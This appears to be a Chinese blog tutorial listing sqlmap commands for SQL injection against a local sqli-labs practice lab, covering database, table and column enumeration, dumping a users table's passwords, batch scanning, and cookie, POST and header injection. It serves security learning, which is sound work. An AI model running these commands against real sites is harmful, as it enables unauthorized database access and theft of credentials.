sqlmap一些常用命令

仅供交流学习使用,请勿用于非法用途

python 复制代码
1)检测url存在漏洞情况:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1"
2)获取所有数据库名称:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --dbs
3)获取指定库的所有表名:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --tables -D security
4)获取当前数据库名是什么:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --current-db
5)获取指定库指定表的所有字段:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --columns -D security -T users
6)!!!禁止使用!!!拖库:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" -C id,password,username  -D security -T users --dump

以上为本地测试,请勿用于非法用途

环境,phpstudy搭建的sqli-labs

补充:

python 复制代码
7)多参数时指定参数:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1&page=1" -p page
	或者:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1&page=1" -p page --batch
	其中 --batch 是自动化测试,需要选择,全部默认Y(注入过程可能比较久)
8)批量检测:python sqlmap.py -m C:\Users\Administrator\Desktop\url.txt
9)设置cookie(检测需要登录的url):python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --cookie "cookie内容" --dbs
10)随机使用一个User-agent头部,或者指定一个User-agent头部: 随机: --random-agent
	指定:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-1/?id=1" --user-agent="User-agent头部" --dbs

以上是get方式

以下是post方式

补充:

python 复制代码
post注入(其他内容获取都一样):python sqlmap.py -r C:\Users\Administrator\Desktop\2.txt -p uname --dbs

2.txt文件内容:

xml 复制代码
POST /sqli-labs-master/Less-11/ HTTP/1.1
Host: 192.168.88.128
User-Agent: 等等等
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: http://192.168.88.128
Connection: close
Referer: http://192.168.88.128/sqli-labs-master/Less-11/
Upgrade-Insecure-Requests: 1

uname=aaa&passwd=bbb&submit=Submit

此文件是burpsuite拦截的,至于怎么保存这个文件自己查询或者直接复制都是可以的

补充:

head头注入:可以是cookie或者User-Agent

python 复制代码
head头注入:python sqlmap.py -u "http://192.168.88.128/sqli-labs-master/Less-20/" --cookie "uname=Dumb" --level 2 --dbs

--level:指定测试等级

相关推荐
whltaoin4 天前
Web渗透思路及src漏洞挖掘思路
网络安全·web渗透
whltaoin6 天前
web渗透-反序列化漏洞
网络安全·web渗透
qq_585532288 天前
【sqlmap命令学习及测试dvwa_SQL_Injection】
dvwa·sqlmap
whltaoin10 天前
web渗透-SSRF漏洞及discuz论坛网站测试
网络安全·ssrf·web渗透
恒7892 个月前
Sqlmap的使用
学习·web安全·sqlmap
染指11103 个月前
27.WEB渗透测试-数据传输与加解密(1)
网络安全·web渗透
染指11104 个月前
17.WEB渗透测试--Kali Linux(五)
网络安全·黑客·web渗透
网安小t6 个月前
ctfshow信息收集(web1-web20)
网络安全·渗透测试·信息收集·web渗透
网安小t6 个月前
ctfshow php特性(web89-web101)
网络安全·渗透测试·php·php特性·web渗透